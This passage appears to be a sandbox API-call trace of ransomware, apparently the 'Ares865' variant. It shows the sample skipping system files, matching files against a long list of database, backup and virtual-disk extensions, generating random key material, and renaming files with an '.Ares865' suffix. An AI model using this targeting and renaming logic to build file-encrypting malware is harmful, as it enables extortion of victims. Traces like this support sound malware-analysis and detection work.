(hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3660, lpName=0x0) returned 0x15c [0086.822] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3660) returned 0x190000 [0086.824] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.827] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.827] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.827] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.827] CloseHandle (hObject=0x15c) returned 1 [0086.827] CloseHandle (hObject=0x118) returned 1 [0086.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.828] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca190500, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xca190500, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="..") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="windows") returned -1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="temp") returned -1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="boot") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.828] lstrlenW (lpString="STINTL.DLL.trx_dll") returned 18 [0086.828] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0086.828] lstrcpyW (in: lpString1=0x2cce468, lpString2="STINTL.DLL.trx_dll" | out: lpString1="STINTL.DLL.trx_dll") returned="STINTL.DLL.trx_dll" [0086.828] lstrlenW (lpString="STINTL.DLL.trx_dll") returned 18 [0086.828] lstrlenW (lpString="Ares865") returned 7 [0086.828] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.828] lstrlenW (lpString=".dll") returned 4 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0086.828] lstrlenW (lpString=".lnk") returned 4 [0086.828] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.828] lstrlenW (lpString=".ini") returned 4 [0086.829] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0086.829] lstrlenW (lpString=".sys") returned 4 [0086.829] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0086.829] lstrlenW (lpString="STINTL.DLL.trx_dll") returned 18 [0086.829] lstrlenW (lpString="bak") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.829] lstrlenW (lpString="ba_") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.829] lstrlenW (lpString="dbb") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.829] lstrlenW (lpString="vmdk") returned 4 [0086.829] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.829] lstrlenW (lpString="rar") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.829] lstrlenW (lpString="zip") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.829] lstrlenW (lpString="tgz") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.829] lstrlenW (lpString="vbox") returned 4 [0086.829] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.829] lstrlenW (lpString="vdi") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.829] lstrlenW (lpString="vhd") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.829] lstrlenW (lpString="vhdx") returned 4 [0086.829] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.829] lstrlenW (lpString="avhd") returned 4 [0086.829] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.829] lstrlenW (lpString="db") returned 2 [0086.829] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.829] lstrlenW (lpString="db2") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.829] lstrlenW (lpString="db3") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.829] lstrlenW (lpString="dbf") returned 3 [0086.829] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.830] lstrlenW (lpString="mdf") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.830] lstrlenW (lpString="mdb") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.830] lstrlenW (lpString="sql") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.830] lstrlenW (lpString="sqlite") returned 6 [0086.830] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.830] lstrlenW (lpString="sqlite3") returned 7 [0086.830] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.830] lstrlenW (lpString="sqlitedb") returned 8 [0086.830] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.830] lstrlenW (lpString="xml") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.830] lstrlenW (lpString="$er") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.830] lstrlenW (lpString="4dd") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.830] lstrlenW (lpString="4dl") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.830] lstrlenW (lpString="^^^") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.830] lstrlenW (lpString="abs") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.830] lstrlenW (lpString="abx") returned 3 [0086.830] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.830] lstrlenW (lpString="accdb") returned 5 [0086.830] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.830] lstrlenW (lpString="accdc") returned 5 [0086.830] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.830] lstrlenW (lpString="accde") returned 5 [0086.830] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.830] lstrlenW (lpString="accdr") returned 5 [0086.830] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.830] lstrlenW (lpString="accdt") returned 5 [0086.830] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.831] lstrlenW (lpString="accdw") returned 5 [0086.831] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.831] lstrlenW (lpString="accft") returned 5 [0086.831] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.831] lstrlenW (lpString="adb") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.831] lstrlenW (lpString="adb") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.831] lstrlenW (lpString="ade") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.831] lstrlenW (lpString="adf") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.831] lstrlenW (lpString="adn") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.831] lstrlenW (lpString="adp") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.831] lstrlenW (lpString="alf") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.831] lstrlenW (lpString="ask") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.831] lstrlenW (lpString="btr") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.831] lstrlenW (lpString="cat") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.831] lstrlenW (lpString="cdb") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.831] lstrlenW (lpString="ckp") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.831] lstrlenW (lpString="cma") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.831] lstrlenW (lpString="cpd") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.831] lstrlenW (lpString="dacpac") returned 6 [0086.831] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.831] lstrlenW (lpString="dad") returned 3 [0086.831] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.831] lstrlenW (lpString="dadiagrams") returned 10 [0086.832] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.832] lstrlenW (lpString="daschema") returned 8 [0086.832] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.832] lstrlenW (lpString="db-journal") returned 10 [0086.832] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.832] lstrlenW (lpString="db-shm") returned 6 [0086.832] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.832] lstrlenW (lpString="db-wal") returned 6 [0086.832] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.832] lstrlenW (lpString="dbc") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.832] lstrlenW (lpString="dbs") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.832] lstrlenW (lpString="dbt") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.832] lstrlenW (lpString="dbv") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.832] lstrlenW (lpString="dbx") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.832] lstrlenW (lpString="dcb") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.832] lstrlenW (lpString="dct") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.832] lstrlenW (lpString="dcx") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.832] lstrlenW (lpString="ddl") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.832] lstrlenW (lpString="dlis") returned 4 [0086.832] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.832] lstrlenW (lpString="dp1") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.832] lstrlenW (lpString="dqy") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.832] lstrlenW (lpString="dsk") returned 3 [0086.832] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.832] lstrlenW (lpString="dsn") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.833] lstrlenW (lpString="dtsx") returned 4 [0086.833] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.833] lstrlenW (lpString="dxl") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.833] lstrlenW (lpString="eco") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.833] lstrlenW (lpString="ecx") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.833] lstrlenW (lpString="edb") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.833] lstrlenW (lpString="epim") returned 4 [0086.833] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.833] lstrlenW (lpString="fcd") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.833] lstrlenW (lpString="fdb") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.833] lstrlenW (lpString="fic") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.833] lstrlenW (lpString="flexolibrary") returned 12 [0086.833] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.833] lstrlenW (lpString="fm5") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.833] lstrlenW (lpString="fmp") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.833] lstrlenW (lpString="fmp12") returned 5 [0086.833] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.833] lstrlenW (lpString="fmpsl") returned 5 [0086.833] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.833] lstrlenW (lpString="fol") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.833] lstrlenW (lpString="fp3") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.833] lstrlenW (lpString="fp4") returned 3 [0086.833] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.833] lstrlenW (lpString="fp5") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.834] lstrlenW (lpString="fp7") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.834] lstrlenW (lpString="fpt") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.834] lstrlenW (lpString="frm") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.834] lstrlenW (lpString="gdb") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.834] lstrlenW (lpString="gdb") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.834] lstrlenW (lpString="grdb") returned 4 [0086.834] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.834] lstrlenW (lpString="gwi") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.834] lstrlenW (lpString="hdb") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.834] lstrlenW (lpString="his") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.834] lstrlenW (lpString="ib") returned 2 [0086.834] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.834] lstrlenW (lpString="idb") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.834] lstrlenW (lpString="ihx") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.834] lstrlenW (lpString="itdb") returned 4 [0086.834] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.834] lstrlenW (lpString="itw") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.834] lstrlenW (lpString="jet") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.834] lstrlenW (lpString="jtx") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.834] lstrlenW (lpString="kdb") returned 3 [0086.834] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.834] lstrlenW (lpString="kexi") returned 4 [0086.834] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.835] lstrlenW (lpString="kexic") returned 5 [0086.835] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.835] lstrlenW (lpString="kexis") returned 5 [0086.835] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.835] lstrlenW (lpString="lgc") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.835] lstrlenW (lpString="lwx") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.835] lstrlenW (lpString="maf") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.835] lstrlenW (lpString="maq") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.835] lstrlenW (lpString="mar") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.835] lstrlenW (lpString="marshal") returned 7 [0086.835] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.835] lstrlenW (lpString="mas") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.835] lstrlenW (lpString="mav") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.835] lstrlenW (lpString="maw") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.835] lstrlenW (lpString="mdbhtml") returned 7 [0086.835] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.835] lstrlenW (lpString="mdn") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.835] lstrlenW (lpString="mdt") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.835] lstrlenW (lpString="mfd") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.835] lstrlenW (lpString="mpd") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.835] lstrlenW (lpString="mrg") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.835] lstrlenW (lpString="mud") returned 3 [0086.835] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.836] lstrlenW (lpString="mwb") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.836] lstrlenW (lpString="myd") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.836] lstrlenW (lpString="ndf") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.836] lstrlenW (lpString="nnt") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.836] lstrlenW (lpString="nrmlib") returned 6 [0086.836] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.836] lstrlenW (lpString="ns2") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.836] lstrlenW (lpString="ns3") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.836] lstrlenW (lpString="ns4") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.836] lstrlenW (lpString="nsf") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.836] lstrlenW (lpString="nv") returned 2 [0086.836] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.836] lstrlenW (lpString="nv2") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.836] lstrlenW (lpString="nwdb") returned 4 [0086.836] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.836] lstrlenW (lpString="nyf") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.836] lstrlenW (lpString="odb") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.836] lstrlenW (lpString="odb") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.836] lstrlenW (lpString="oqy") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.836] lstrlenW (lpString="ora") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.836] lstrlenW (lpString="orx") returned 3 [0086.836] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.837] lstrlenW (lpString="owc") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.837] lstrlenW (lpString="p96") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.837] lstrlenW (lpString="p97") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.837] lstrlenW (lpString="pan") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.837] lstrlenW (lpString="pdb") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.837] lstrlenW (lpString="pdm") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.837] lstrlenW (lpString="pnz") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.837] lstrlenW (lpString="qry") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.837] lstrlenW (lpString="qvd") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.837] lstrlenW (lpString="rbf") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.837] lstrlenW (lpString="rctd") returned 4 [0086.837] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.837] lstrlenW (lpString="rod") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.837] lstrlenW (lpString="rodx") returned 4 [0086.837] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.837] lstrlenW (lpString="rpd") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.837] lstrlenW (lpString="rsd") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.837] lstrlenW (lpString="sas7bdat") returned 8 [0086.837] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.837] lstrlenW (lpString="sbf") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.837] lstrlenW (lpString="scx") returned 3 [0086.837] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.837] lstrlenW (lpString="sdb") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.838] lstrlenW (lpString="sdc") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.838] lstrlenW (lpString="sdf") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.838] lstrlenW (lpString="sis") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.838] lstrlenW (lpString="spq") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.838] lstrlenW (lpString="te") returned 2 [0086.838] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.838] lstrlenW (lpString="teacher") returned 7 [0086.838] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.838] lstrlenW (lpString="tmd") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.838] lstrlenW (lpString="tps") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.838] lstrlenW (lpString="trc") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.838] lstrlenW (lpString="trc") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.838] lstrlenW (lpString="trm") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.838] lstrlenW (lpString="udb") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.838] lstrlenW (lpString="udl") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.838] lstrlenW (lpString="usr") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.838] lstrlenW (lpString="v12") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.838] lstrlenW (lpString="vis") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.838] lstrlenW (lpString="vpd") returned 3 [0086.838] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.838] lstrlenW (lpString="vvv") returned 3 [0086.839] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.839] lstrlenW (lpString="wdb") returned 3 [0086.839] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.839] lstrlenW (lpString="wmdb") returned 4 [0086.839] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.839] lstrlenW (lpString="wrk") returned 3 [0086.839] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.839] lstrlenW (lpString="xdb") returned 3 [0086.839] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.839] lstrlenW (lpString="xld") returned 3 [0086.839] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.839] lstrlenW (lpString="xmlff") returned 5 [0086.839] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.839] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.Ares865") returned 78 [0086.839] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All 